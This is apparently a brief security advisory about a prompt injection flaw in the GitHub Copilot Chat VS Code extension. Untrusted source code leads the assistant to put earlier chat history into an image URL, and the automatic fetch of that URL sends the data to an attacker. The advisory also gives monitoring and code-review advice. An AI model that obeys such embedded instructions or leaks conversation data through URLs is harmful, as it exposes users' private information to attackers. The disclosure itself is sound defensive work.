GitHub Copilot Chat Vulnerable to Data Exfiltration
Published Fri, Jun 14th, 2024
Platforms
Summary
GitHub Copilot Chat VS Code Extension was vulnerable to data exfiltration via prompt injection when analyzing untrusted source code. The vulnerability allowed attackers to access previous conversation turns and append information from the chat history to an image URL, which was then automatically retrieved by Copilot, sending the data to the attacker.
Monitor for unexpected outbound image requests from the GitHub Copilot Chat extension. Review source code for potential malicious instructions that could trigger prompt injection attacks.